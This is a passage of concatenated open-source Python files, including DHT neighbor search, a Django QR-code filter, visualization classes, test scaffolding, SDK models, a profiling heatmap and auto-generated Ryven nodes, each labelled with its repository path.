) # farthest-first heap of size beam_size, used for early-stopping and to select results
while len(nearest_nodes) > beam_size:
heapq.heappop(nearest_nodes)
visited_nodes |= set(initial_nodes)
upper_bound = -nearest_nodes[0][0] # distance to farthest element that is still in beam
was_interrupted = False # will set to True if host triggered beam search to stop via get_neighbors
while (not was_interrupted) and len(unvisited_nodes) != 0 and unvisited_nodes[0][0] <= upper_bound:
_, node_id = heapq.heappop(unvisited_nodes) # note: this --^ is the smallest element in heap (see heapq)
neighbors, was_interrupted = await get_neighbors(node_id)
neighbors = [node_id for node_id in neighbors if node_id not in visited_nodes]
visited_nodes.update(neighbors)
for neighbor_id, distance in zip(neighbors, query_id.xor_distance(neighbors)):
if distance <= upper_bound or len(nearest_nodes) < beam_size:
heapq.heappush(unvisited_nodes, (distance, neighbor_id))
heapq_add_or_replace = heapq.heappush if len(nearest_nodes) < beam_size else heapq.heappushpop
heapq_add_or_replace(nearest_nodes, (-distance, neighbor_id))
upper_bound = -nearest_nodes[0][0] # distance to beam_size-th nearest element found so far
return tuple(node_id for _, node_id in heapq.nlargest(beam_size, nearest_nodes)), visited_nodes
async def traverse_dht(
queries: Collection[DHTID],
initial_nodes: List[DHTID],
beam_size: int,
num_workers: int,
queries_per_call: int,
get_neighbors: Callable[[DHTID, Collection[DHTID]], Awaitable[Dict[DHTID, Tuple[Tuple[DHTID], bool]]]],
found_callback: Optional[Callable[[DHTID, List[DHTID], Set[DHTID]], Awaitable[Any]]] = None,
await_all_tasks: bool = True,
visited_nodes: Optional[Dict[DHTID, Set[DHTID]]] = (),
) -> Tuple[Dict[DHTID, List[DHTID]], Dict[DHTID, Set[DHTID]]]:
"""
Search the DHT for nearest neighbors to :queries: (based on DHTID.xor_distance). Use get_neighbors to request peers.
The algorithm can reuse intermediate results from each query to speed up search for other (similar) queries.
:param queries: a list of search queries, find beam_size neighbors for these DHTIDs
:param initial_nodes: nodes used to pre-populate beam search heap, e.g. [my_own_DHTID, ...maybe_some_peers]
:param beam_size: beam search will not give up until it visits this many nearest nodes (to query_id) from the heap
:param num_workers: run up to this many concurrent get_neighbors requests, each querying one peer for neighbors.
When selecting a peer to request neighbors from, workers try to balance concurrent exploration across queries.
A worker will expand the nearest candidate to a query with least concurrent requests from other workers.
If several queries have the same number of concurrent requests, prefer the one with nearest XOR distance.
:param queries_per_call: workers can pack up to this many queries in one get_neighbors call. These queries contain
the primary query (see num_workers above) and up to `queries_per_call - 1` nearest unfinished queries.
:param get_neighbors: A function that requests a given peer to find nearest neighbors for multiple queries
async def get_neighbors(peer, queries) -> {query1: ([nearest1, nearest2, ...], False), query2: ([...], True)}
For each query in queries, return nearest neighbors (known to a given peer) and a boolean "should_stop" flag
If should_stop is True, traverse_dht will no longer search for this query or request it from other peers.
The search terminates iff each query is either stopped via should_stop or finds beam_size nearest nodes.
:param found_callback: if specified, call this callback for each finished query the moment it finishes or is stopped
More specifically, run asyncio.create_task(found_callback(query, nearest_to_query, visited_for_query))
Using this callback allows one to process results faster before traverse_dht is finishes for all queries.
It is guaranteed that found_callback will be called exactly once on each query in queries.
:param await_all_tasks: if True, wait for all tasks to finish before returning, otherwise returns after finding
nearest neighbors and finishes the remaining tasks (callbacks and queries to known-but-unvisited nodes)
:param visited_nodes: for each query, do not call get_neighbors on these nodes, nor return them among nearest.
:note: the source code of this function can get tricky to read. Take a look at `simple_traverse_dht` function
for reference. That function implements a special case of traverse_dht with a single query and one worker.
:returns: a dict of nearest nodes, and another dict of visited nodes
nearest nodes: { query -> a list of up to beam_size nearest nodes, ordered nearest-first }
visited nodes: { query -> a set of all nodes that received requests for a given query }
"""
if len(queries) == 0:
return {}, dict(visited_nodes or {})
unfinished_queries = set(queries) # all queries that haven't triggered finish_search yet
candidate_nodes: Dict[DHTID, List[Tuple[int, DHTID]]] = {} # heap: unvisited nodes, ordered nearest-to-farthest
nearest_nodes: Dict[DHTID, List[Tuple[int, DHTID]]] = {} # heap: top-k nearest nodes, farthest-to-nearest
known_nodes: Dict[DHTID, Set[DHTID]] = {} # all nodes ever added to the heap (for deduplication)
visited_nodes: Dict[DHTID, Set[DHTID]] = dict(visited_nodes or {}) # nodes that were chosen for get_neighbors call
pending_tasks = set() # all active tasks (get_neighbors and found_callback)
active_workers = Counter({q: 0 for q in queries}) # count workers that search for this query
search_finished_event = asyncio.Event() # used to immediately stop all workers when the search is finished
heap_updated_event = asyncio.Event() # if a worker has no nodes to explore, it will await other workers
heap_updated_event.set()
# initialize data structures
for query in queries:
distances = query.xor_distance(initial_nodes)
candidate_nodes[query] = list(zip(distances, initial_nodes))
nearest_nodes[query] = list(zip([-d for d in distances], initial_nodes))
heapq.heapify(candidate_nodes[query])
heapq.heapify(nearest_nodes[query])
while len(nearest_nodes[query]) > beam_size:
heapq.heappop(nearest_nodes[query])
known_nodes[query] = set(initial_nodes)
visited_nodes[query] = set(visited_nodes.get(query, ()))
def heuristic_priority(heap_query: DHTID):
"""Workers prioritize expanding nodes that lead to under-explored queries (by other workers)"""
if has_candidates(heap_query):
# prefer candidates in heaps with least number of concurrent workers, break ties by distance to query
return active_workers[heap_query], candidate_nodes[heap_query][ROOT][0]
return float("inf"), float("inf") # try not to explore vertices with no candidates
def has_candidates(query: DHTID):
"""Whether this query's heap contains at least one candidate node that can be explored"""
return candidate_nodes[query] and candidate_nodes[query][ROOT][0] <= upper_bound(query)
def upper_bound(query: DHTID):
"""Any node that is farther from query than upper_bound(query) will not be added to heaps"""
return -nearest_nodes[query][ROOT][0] if len(nearest_nodes[query]) >= beam_size else float("inf")
def finish_search(query):
"""Remove query from a list of targets"""
unfinished_queries.remove(query)
if len(unfinished_queries) == 0:
search_finished_event.set()
if found_callback:
nearest_neighbors = [peer for _, peer in heapq.nlargest(beam_size, nearest_nodes[query])]
pending_tasks.add(asyncio.create_task(found_callback(query, nearest_neighbors, set(visited_nodes[query]))))
async def worker():
while unfinished_queries:
# select the heap based on priority
chosen_query: DHTID = min(unfinished_queries, key=heuristic_priority)
# if there are no peers to explore...
if not has_candidates(chosen_query):
other_workers_pending = active_workers.most_common(1)[0][1] > 0
if other_workers_pending: # ... wait for other workers (if any) or add more peers
heap_updated_event.clear()
await heap_updated_event.wait()
continue
else: # ... or if there is no hope of new nodes, finish search immediately
for query in list(unfinished_queries):
finish_search(query)
break
# select vertex to be explored
chosen_distance_to_query, chosen_peer = heapq.heappop(candidate_nodes[chosen_query])
if chosen_peer in visited_nodes[chosen_query] or chosen_distance_to_query > upper_bound(chosen_query):
if chosen_distance_to_query > upper_bound(chosen_query) and active_workers[chosen_query] == 0:
finish_search(chosen_query)
continue
# find additional queries to pack in the same request
possible_additional_queries = [
query
for query in unfinished_queries
if query != chosen_query and chosen_peer not in visited_nodes[query]
]
queries_to_call = [chosen_query] + heapq.nsmallest(
queries_per_call - 1, possible_additional_queries, key=chosen_peer.xor_distance
)
# update priorities for subsequent workers
active_workers.update(queries_to_call)
for query_to_call in queries_to_call:
visited_nodes[query_to_call].add(chosen_peer)
# get nearest neighbors (over network) and update search heaps. Abort if search finishes early
get_neighbors_task = asyncio.create_task(get_neighbors(chosen_peer, queries_to_call))
pending_tasks.add(get_neighbors_task)
await asyncio.wait([get_neighbors_task, search_finished_event.wait()], return_when=asyncio.FIRST_COMPLETED)
if search_finished_event.is_set():
break # other worker triggered finish_search, we exit immediately
pending_tasks.remove(get_neighbors_task)
# add nearest neighbors to their respective heaps
for query, (neighbors_for_query, should_stop) in get_neighbors_task.result().items():
if should_stop and (query in unfinished_queries):
finish_search(query)
if query not in unfinished_queries:
continue # either we finished search or someone else did while we awaited
for neighbor in neighbors_for_query:
if neighbor not in known_nodes[query]:
known_nodes[query].add(neighbor)
distance = query.xor_distance(neighbor)
if distance <= upper_bound(query) or len(nearest_nodes[query]) < beam_size:
heapq.heappush(candidate_nodes[query], (distance, neighbor))
if len(nearest_nodes[query]) < beam_size:
heapq.heappush(nearest_nodes[query], (-distance, neighbor))
else:
heapq.heappushpop(nearest_nodes[query], (-distance, neighbor))
# we finished processing a request, update priorities for other workers
active_workers.subtract(queries_to_call)
heap_updated_event.set()
workers = [asyncio.create_task(worker()) for _ in range(num_workers)]
try:
# spawn all workers and wait for them to terminate; workers terminate after exhausting unfinished_queries
await asyncio.wait(workers, return_when=asyncio.FIRST_COMPLETED)
assert len(unfinished_queries) == 0 and search_finished_event.is_set()
if await_all_tasks:
await asyncio.gather(*pending_tasks)
nearest_neighbors_per_query = {
query: [peer for _, peer in heapq.nlargest(beam_size, nearest_nodes[query])] for query in queries
}
return nearest_neighbors_per_query, visited_nodes
except asyncio.CancelledError as e:
for worker in workers:
worker.cancel()
raise e
|
src/byro/common/templatetags/qrcode_inline.py | mv-idatalytics/jenkins-byro | 114 | 11090091 | import base64
import io
import qrcode
from django import template
register = template.Library()
@register.filter
def qrcode_inline(value):
qr = qrcode.QRCode(
version=None, box_size=2, error_correction=qrcode.constants.ERROR_CORRECT_Q
)
qr.add_data(value)
qr.make(fit=True)
img = qr.make_image()
with io.BytesIO() as output:
img.save(output, format="PNG")
return "data:image/png;base64,{}".format(
base64.b64encode(output.getvalue()).decode("us-ascii")
)
|
lightning/types/base.py | lightning-viz/lightning-python | 176 | 11090110 | from lightning import Visualization, VisualizationLocal
import requests
import six
class Base(Visualization, VisualizationLocal):
_name = 'base'
_options = {
'width': {'default': None},
'height': {'default': None},
'description': {'default': None}
}
_doc = """
width : int, optional, default=None
Width of visualization in pixels.
height : int, optional, default=None
Height of visualization in pixels.
description : str, optional, default=None
Markdown formatted text to show with visualization
when displayed in a Lightning server.
"""
_data_dict_inputs = {}
@classmethod
def _check_unkeyed_arrays(cls, key, val):
if key not in cls._data_dict_inputs:
return val
if not isinstance(val, list):
raise Exception("Must provide a list")
if len(val) == 0:
return val
if isinstance(val[0], dict) and isinstance(val[-1], dict):
return val
if isinstance(val[0], list) and isinstance(val[-1], list):
# if both the first and last elements are lists
out = []
mapping = cls._data_dict_inputs[key]
for l in val:
out.append(dict(zip(mapping, l)))
return out
@staticmethod
def _ensure_dict_or_list(x):
if isinstance(x, dict):
return x
if isinstance(x, list):
return x
if isinstance(x, str):
return x
if isinstance(x, (int, float, complex)):
return x
try:
# convert numpy arrays to lists
return x.tolist()
except Exception:
pass
# add other data type conversions here
raise Exception("Could not convert to correct data type")
@classmethod
def _clean_data(cls, *args, **kwargs):
"""
Convert raw data into a dictionary with plot-type specific methods.
The result of the cleaning operation should be a dictionary.
If the dictionary contains a 'data' field it will be passed directly
(ensuring appropriate formatting). Otherwise, it should be a
dictionary of data-type specific array data (e.g. 'points',
'timeseries'), which will be labeled appropriately
(see _check_unkeyed_arrays).
"""
datadict = cls.clean(*args, **kwargs)
if 'data' in datadict:
data = datadict['data']
data = cls._ensure_dict_or_list(data)
else:
data = {}
for key in datadict:
if key == 'images':
data[key] = datadict[key]
else:
d = cls._ensure_dict_or_list(datadict[key])
data[key] = cls._check_unkeyed_arrays(key, d)
return data
@classmethod
def _clean_options(cls, **kwargs):
options = {}
description = None
if hasattr(cls, '_options'):
for key, value in six.iteritems(kwargs):
if key in cls._options:
lgn_option = cls._options[key].get('name', key)
options[lgn_option] = value
if key == 'description':
description = value
return options, description
@classmethod
def _baseplot_local(cls, type, *args, **kwargs):
data = cls._clean_data(*args)
options, description = cls._clean_options(**kwargs)
payload = {'type': type, 'options': options}
if 'images' in data:
payload['images'] = data['images']
else:
payload['data'] = data
viz = VisualizationLocal._create(**payload)
return viz
@classmethod
def _baseplot(cls, session, type, *args, **kwargs):
"""
Base method for plotting data and images.
Applies a plot-type specific cleaning operation to generate
a dictionary with the data, then creates a visualization with the data.
Expects a session and a type, followed by all plot-type specific
positional and keyword arguments, which will be handled by the clean
method of the given plot type.
If the dictionary contains only images, or only non-image data,
they will be passed on their own. If the dictionary contains
both images and non-image data, the images will be appended
to the visualization.
"""
if not type:
raise Exception("Must provide a plot type")
options, description = cls._clean_options(**kwargs)
data = cls._clean_data(*args)
if 'images' in data and len(data) > 1:
images = data['images']
del data['images']
viz = cls._create(session, data=data, type=type, options=options, description=description)
first_image, remaining_images = images[0], images[1:]
viz._append_image(first_image)
for image in remaining_images:
viz._append_image(image)
elif 'images' in data:
images = data['images']
viz = cls._create(session, images=images, type=type, options=options, description=description)
else:
viz = cls._create(session, data=data, type=type, options=options, description=description)
return viz
def update(self, *args, **kwargs):
"""
Base method for updating data.
Applies a plot-type specific cleaning operation, then
updates the data in the visualization.
"""
data = self._clean_data(*args, **kwargs)
if 'images' in data:
images = data['images']
for img in images:
self._update_image(img)
else:
self._update_data(data=data)
def append(self, *args, **kwargs):
"""
Base method for appending data.
Applies a plot-type specific cleaning operation, then
appends data to the visualization.
"""
data = self._clean_data(*args, **kwargs)
if 'images' in data:
images = data['images']
for img in images:
self._append_image(img)
else:
self._append_data(data=data)
def _get_user_data(self):
"""
Base method for retrieving user data from a viz.
"""
url = self.session.host + '/sessions/' + str(self.session.id) + '/visualizations/' + str(self.id) + '/settings/'
r = requests.get(url)
if r.status_code == 200:
content = r.json()
else:
raise Exception('Error retrieving user data from server')
return content
|
hacking/tests/__init__.py | UbuntuEvangelist/hacking | 187 | 11090112 | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import fixtures
import testtools
_TRUE_VALUES = ('True', 'true', '1', 'yes')
class TestCase(testtools.TestCase):
"""Test case base class for all unit tests."""
def setUp(self):
"""Run before each test method to initialize test environment."""
super(TestCase, self).setUp()
test_timeout = os.environ.get('OS_TEST_TIMEOUT', 0)
try:
test_timeout = int(test_timeout)
except ValueError:
# If timeout value is invalid do not set a timeout.
test_timeout = 0
if test_timeout > 0:
self.useFixture(fixtures.Timeout(test_timeout, gentle=True))
if os.environ.get('OS_STDOUT_CAPTURE') in _TRUE_VALUES:
stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout))
if os.environ.get('OS_STDERR_CAPTURE') in _TRUE_VALUES:
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
def assertCheckFails(self, check_func, *args, **kwargs):
if not list(check_func(*args, **kwargs)):
raise AssertionError("Check %s did not fail." %
check_func.__name__)
def assertCheckPasses(self, check_func, *args, **kwargs):
try:
self.assertCheckFails(check_func, *args, **kwargs)
except AssertionError:
return
else:
raise AssertionError("Check %s failed." % check_func.__name__)
|
safe_rl/pg/utils.py | florisdenhengst/safety-starter-agents | 216 | 11090136 | <reponame>florisdenhengst/safety-starter-agents
import numpy as np
import scipy.signal
EPS = 1e-8
def combined_shape(length, shape=None):
if shape is None:
return (length,)
return (length, shape) if np.isscalar(shape) else (length, *shape)
def keys_as_sorted_list(dict):
return sorted(list(dict.keys()))
def values_as_sorted_list(dict):
return [dict[k] for k in keys_as_sorted_list(dict)]
def discount_cumsum(x, discount):
"""
magic from rllab for computing discounted cumulative sums of vectors.
input:
vector x,
[x0,
x1,
x2]
output:
[x0 + discount * x1 + discount^2 * x2,
x1 + discount * x2,
x2]
"""
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
|
Calibration/TkAlCaRecoProducers/python/AlcaBeamSpotProducerHP_cff.py | ckamtsikis/cmssw | 852 | 11090151 | import FWCore.ParameterSet.Config as cms
from Calibration.TkAlCaRecoProducers.AlcaBeamSpotProducerHP_cfi import alcaBeamSpotProducerHP
alcaBeamSpotHP = cms.Sequence( alcaBeamSpotProducerHP )
|
custom_components/hacs/helpers/network.py | svkowalski/HAcore_QNAP | 297 | 11090174 | """Verify network."""
from socket import gaierror
from integrationhelper import Logger
def internet_connectivity_check(host="api.github.com"):
"""Verify network connectivity."""
return True
|
tests/bytecode/mp-tests/yield2.py | LabAixBidouille/micropython | 303 | 11090176 | <filename>tests/bytecode/mp-tests/yield2.py
def f():
yield from a
yield from (a, b)
yield from f(a)
lambda:(yield)
lambda:(yield 1) + 2
|
alipay/aop/api/domain/AlipayUserPassTemplateCreateModel.py | alipay/alipay-sdk-python-all | 213 | 11090186 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.TemplateEvoucherDTO import TemplateEvoucherDTO
from alipay.aop.api.domain.TemplateFileDTO import TemplateFileDTO
from alipay.aop.api.domain.TemplateImageDTO import TemplateImageDTO
from alipay.aop.api.domain.TemplateMerchantDTO import TemplateMerchantDTO
from alipay.aop.api.domain.TemplatePlatformDTO import TemplatePlatformDTO
from alipay.aop.api.domain.TemplateStyleDTO import TemplateStyleDTO
class AlipayUserPassTemplateCreateModel(object):
def __init__(self):
self._evoucher_info = None
self._file_info = None
self._image = None
self._merchant = None
self._platform = None
self._style = None
self._unique_id = None
@property
def evoucher_info(self):
return self._evoucher_info
@evoucher_info.setter
def evoucher_info(self, value):
if isinstance(value, TemplateEvoucherDTO):
self._evoucher_info = value
else:
self._evoucher_info = TemplateEvoucherDTO.from_alipay_dict(value)
@property
def file_info(self):
return self._file_info
@file_info.setter
def file_info(self, value):
if isinstance(value, TemplateFileDTO):
self._file_info = value
else:
self._file_info = TemplateFileDTO.from_alipay_dict(value)
@property
def image(self):
return self._image
@image.setter
def image(self, value):
if isinstance(value, TemplateImageDTO):
self._image = value
else:
self._image = TemplateImageDTO.from_alipay_dict(value)
@property
def merchant(self):
return self._merchant
@merchant.setter
def merchant(self, value):
if isinstance(value, TemplateMerchantDTO):
self._merchant = value
else:
self._merchant = TemplateMerchantDTO.from_alipay_dict(value)
@property
def platform(self):
return self._platform
@platform.setter
def platform(self, value):
if isinstance(value, TemplatePlatformDTO):
self._platform = value
else:
self._platform = TemplatePlatformDTO.from_alipay_dict(value)
@property
def style(self):
return self._style
@style.setter
def style(self, value):
if isinstance(value, TemplateStyleDTO):
self._style = value
else:
self._style = TemplateStyleDTO.from_alipay_dict(value)
@property
def unique_id(self):
return self._unique_id
@unique_id.setter
def unique_id(self, value):
self._unique_id = value
def to_alipay_dict(self):
params = dict()
if self.evoucher_info:
if hasattr(self.evoucher_info, 'to_alipay_dict'):
params['evoucher_info'] = self.evoucher_info.to_alipay_dict()
else:
params['evoucher_info'] = self.evoucher_info
if self.file_info:
if hasattr(self.file_info, 'to_alipay_dict'):
params['file_info'] = self.file_info.to_alipay_dict()
else:
params['file_info'] = self.file_info
if self.image:
if hasattr(self.image, 'to_alipay_dict'):
params['image'] = self.image.to_alipay_dict()
else:
params['image'] = self.image
if self.merchant:
if hasattr(self.merchant, 'to_alipay_dict'):
params['merchant'] = self.merchant.to_alipay_dict()
else:
params['merchant'] = self.merchant
if self.platform:
if hasattr(self.platform, 'to_alipay_dict'):
params['platform'] = self.platform.to_alipay_dict()
else:
params['platform'] = self.platform
if self.style:
if hasattr(self.style, 'to_alipay_dict'):
params['style'] = self.style.to_alipay_dict()
else:
params['style'] = self.style
if self.unique_id:
if hasattr(self.unique_id, 'to_alipay_dict'):
params['unique_id'] = self.unique_id.to_alipay_dict()
else:
params['unique_id'] = self.unique_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayUserPassTemplateCreateModel()
if 'evoucher_info' in d:
o.evoucher_info = d['evoucher_info']
if 'file_info' in d:
o.file_info = d['file_info']
if 'image' in d:
o.image = d['image']
if 'merchant' in d:
o.merchant = d['merchant']
if 'platform' in d:
o.platform = d['platform']
if 'style' in d:
o.style = d['style']
if 'unique_id' in d:
o.unique_id = d['unique_id']
return o
|
doc/tutorials/shader_toy/shadertoy_demo_1.py | janscas/arcade | 824 | 11090190 | <reponame>janscas/arcade
import arcade
# Derive an application window from Arcade's parent Window class
class MyGame(arcade.Window):
def __init__(self):
# Call the parent constructor
super().__init__(width=1920, height=1080)
def on_draw(self):
# Clear the screen
self.clear()
if __name__ == "__main__":
MyGame()
arcade.run()
|
data_collection/gazette/spiders/sc_jupia.py | kaiocp/querido-diario | 454 | 11090239 | from gazette.spiders.base.fecam import FecamGazetteSpider
class ScJupiaSpider(FecamGazetteSpider):
name = "sc_jupia"
FECAM_QUERY = "cod_entidade:143"
TERRITORY_ID = "4209177"
|
smdebug/profiler/analysis/notebook_utils/heatmap.py | jsspric/sagemaker-debugger | 133 | 11090243 | <gh_stars>100-1000
# Standard Library
import re
from copy import deepcopy
# Third Party
import bokeh
import numpy as np
from bokeh.io import output_notebook, show
from bokeh.models import ColumnDataSource, HoverTool
from bokeh.models.glyphs import Image
from bokeh.models.tickers import FixedTicker
from bokeh.plotting import figure, show
output_notebook(hide_banner=True)
class Heatmap:
def __init__(
self,
metrics_reader,
select_metrics=[],
starttime=0,
endtime=None,
select_dimensions=[".*CPU", ".*GPU"],
select_events=[".*"],
plot_height=350,
show_workers=True,
):
self.select_dimensions = select_dimensions
self.select_events = select_events
self.show_workers = show_workers
self.metrics_reader = metrics_reader
self.available_dimensions = []
self.available_events = []
self.start = 0
if endtime == None:
# get timestamp of latest file and events
self.last_timestamp_system_metrics = (
self.metrics_reader.get_timestamp_of_latest_available_file()
)
else:
self.last_timestamp_system_metrics = endtime
events = self.metrics_reader.get_events(starttime, self.last_timestamp_system_metrics)
self.plot_height = plot_height
# get timestamp of latest file and events
self.last_timestamp = self.metrics_reader.get_timestamp_of_latest_available_file()
self.system_metrics = self.preprocess_system_metrics(events, system_metrics={})
self.create_plot()
def preprocess_system_metrics(self, events, system_metrics):
# read all available system metric events and store them in dict
for event in events:
if event.node_id not in system_metrics:
system_metrics[event.node_id] = {}
if event.dimension not in system_metrics[event.node_id]:
system_metrics[event.node_id][event.dimension] = {}
if event.name not in system_metrics[event.node_id][event.dimension]:
system_metrics[event.node_id][event.dimension][event.name] = []
system_metrics[event.node_id][event.dimension][event.name].append(event.value)
# number of datapoints
self.width = np.inf
# preprocess data
for node in system_metrics:
for dimension in system_metrics[node]:
if dimension not in self.available_dimensions:
self.available_dimensions.append(dimension)
for event in system_metrics[node][dimension]:
# list of available events
if event not in self.available_events:
self.available_events.append(event)
# convert to numpy
system_metrics[node][dimension][event] = np.array(
system_metrics[node][dimension][event]
)
# we may not have the exact same number of measurements per metric
if system_metrics[node][dimension][event].shape[0] < self.width:
self.width = system_metrics[node][dimension][event].shape[0]
# convert metrics to percentages
if dimension in ["Algorithm", "Platform", ""]:
max_value = np.max(system_metrics[node][dimension][event])
if max_value != 0:
system_metrics[node][dimension][event] = (
system_metrics[node][dimension][event] / max_value
)
system_metrics[node][dimension][event] = (
system_metrics[node][dimension][event] * 100
)
# compute total utilization per event dimension
for node in system_metrics:
for dimension in system_metrics[node]:
n = len(system_metrics[node][dimension])
total = [sum(x) for x in zip(*system_metrics[node][dimension].values())]
system_metrics[node][dimension]["total"] = np.array(total) / n
self.available_events.append("total")
nodes = list(system_metrics.keys())
system_metrics["node_total"] = {}
# compute total utilization per worker node
for dimension in system_metrics[nodes[0]]:
system_metrics["node_total"][dimension] = {}
node_total = []
for node in nodes:
len2 = len(node_total)
if len2 > 0:
len1 = system_metrics[node][dimension]["total"].shape[0]
if len1 < len2:
node_total[:len1] = (
node_total[:len1] + system_metrics[node][dimension]["total"]
)
else:
node_total = node_total + system_metrics[node][dimension]["total"][:len2]
else:
node_total = deepcopy(system_metrics[node][dimension]["total"])
system_metrics["node_total"][dimension]["total"] = node_total / (len(nodes))
# filter events and dimensions
self.filtered_events = []
print(f"select events:{self.select_events}")
self.filtered_dimensions = []
print(f"select dimensions:{self.select_dimensions}")
for metric in self.select_events:
r = re.compile(r".*" + metric)
self.filtered_events.extend(list(filter(r.search, self.available_events)))
self.filtered_events = set(self.filtered_events)
print(f"filtered_events:{self.filtered_events}")
for metric in self.select_dimensions:
r = re.compile(metric) # + r".*")
self.filtered_dimensions.extend(list(filter(r.search, self.available_dimensions)))
self.filtered_dimensions = set(self.filtered_dimensions)
print(f"filtered_dimensions:{self.filtered_dimensions}")
return system_metrics
def create_plot(self):
# define list of metric names (needed for tooltip)
tmp = []
metric_names = []
yaxis = {}
for node in self.system_metrics:
for dimension in self.system_metrics[node]:
if dimension in self.filtered_dimensions:
for event in self.system_metrics[node][dimension]:
if event in self.filtered_events:
values = self.system_metrics[node][dimension][event][: self.width]
tmp.append(values)
metric_names.append(dimension + "_" + event + "_" + node)
yaxis[len(tmp)] = dimension + "_" + event + "_" + node
ymax = len(tmp)
yaxis[ymax] = ""
# define figure
start = 0
if self.width > 1000:
start = self.width - 1000
self.plot = figure(
plot_height=self.plot_height,
x_range=(start, self.width),
y_range=(0, ymax),
plot_width=1000,
tools="crosshair,reset,xwheel_zoom, box_edit",
)
self.plot.xaxis.axis_label = "Indices"
# tooltip
hover = HoverTool(
tooltips=[("usage", "@image"), ("metric", "@metric"), ("index", "$x{10}")]
)
# map colors to values between 0 and 100
color_mapper = bokeh.models.LinearColorMapper(bokeh.palettes.viridis(100))
color_mapper.high = 100
color_mapper.low = 0
tmp = np.array(tmp)
# create column data source
self.source = ColumnDataSource(
data=dict(
image=[np.array(tmp[i]).reshape(1, -1) for i in range(len(tmp))],
x=[0] * ymax,
y=[i for i in range(ymax)],
dw=[self.width] * (ymax),
dh=[1.3] * (ymax),
metric=[i for i in metric_names],
)
)
# heatmap placeholder
images = Image(image="image", x="x", y="y", dw="dw", dh="dh", color_mapper=color_mapper)
# plot
self.plot.add_glyph(self.source, images)
self.plot.add_tools(hover)
self.plot.xgrid.visible = False
self.plot.ygrid.visible = False
self.plot.yaxis.ticker = FixedTicker(ticks=np.arange(0, ymax).tolist())
self.plot.yaxis.major_label_text_font_size = "7pt"
self.plot.yaxis.major_label_overrides = yaxis
self.plot.xaxis.major_label_text_font_size = "0pt"
self.target = show(self.plot, notebook_handle=True)
|
Ryven/packages/auto_generated/_pydecimal/nodes.py | tfroehlich82/Ryven | 2,872 | 11090303 | <filename>Ryven/packages/auto_generated/_pydecimal/nodes.py
from NENV import *
import _pydecimal
class NodeBase(Node):
pass
class _All_Zeros_Node(NodeBase):
"""
Matches zero or more characters at the beginning of the string."""
title = '_all_zeros'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='string'),
NodeInputBP(label='pos', dtype=dtypes.Data(default=0, size='s')),
NodeInputBP(label='endpos', dtype=dtypes.Data(default=9223372036854775807, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._all_zeros(self.input(0), self.input(1), self.input(2)))
class _Convert_For_Comparison_Node(NodeBase):
"""
Given a Decimal instance self and a Python object other, return
a pair (s, o) of Decimal instances such that "s op o" is
equivalent to "self op other" for any of the 6 comparison
operators "op".
"""
title = '_convert_for_comparison'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='other'),
NodeInputBP(label='equality_op', dtype=dtypes.Data(default=False, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._convert_for_comparison(self.input(0), self.input(1)))
class _Convert_Other_Node(NodeBase):
"""
Convert other to Decimal.
Verifies that it's ok to use in an implicit construction.
If allow_float is true, allow conversion from float; this
is used in the comparison methods (__eq__ and friends).
"""
title = '_convert_other'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='other'),
NodeInputBP(label='raiseit', dtype=dtypes.Data(default=False, size='s')),
NodeInputBP(label='allow_float', dtype=dtypes.Data(default=False, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._convert_other(self.input(0), self.input(1), self.input(2)))
class _Dec_From_Triple_Node(NodeBase):
"""
Create a decimal instance directly, without any validation,
normalization (e.g. removal of leading zeros) or argument
conversion.
This function is for *internal use only*.
"""
title = '_dec_from_triple'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='sign'),
NodeInputBP(label='coefficient'),
NodeInputBP(label='exponent'),
NodeInputBP(label='special', dtype=dtypes.Data(default=False, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dec_from_triple(self.input(0), self.input(1), self.input(2), self.input(3)))
class _Decimal_Lshift_Exact_Node(NodeBase):
"""
Given integers n and e, return n * 10**e if it's an integer, else None.
The computation is designed to avoid computing large powers of 10
unnecessarily.
>>> _decimal_lshift_exact(3, 4)
30000
>>> _decimal_lshift_exact(300, -999999999) # returns None
"""
title = '_decimal_lshift_exact'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='n'),
NodeInputBP(label='e'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._decimal_lshift_exact(self.input(0), self.input(1)))
class _Dexp_Node(NodeBase):
"""
Compute an approximation to exp(c*10**e), with p decimal places of
precision.
Returns integers d, f such that:
10**(p-1) <= d <= 10**p, and
(d-1)*10**f < exp(c*10**e) < (d+1)*10**f
In other words, d*10**f is an approximation to exp(c*10**e) with p
digits of precision, and with an error in d of at most 1. This is
almost, but not quite, the same as the error being < 1ulp: when d
= 10**(p-1) the error could be up to 10 ulp."""
title = '_dexp'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='c'),
NodeInputBP(label='e'),
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
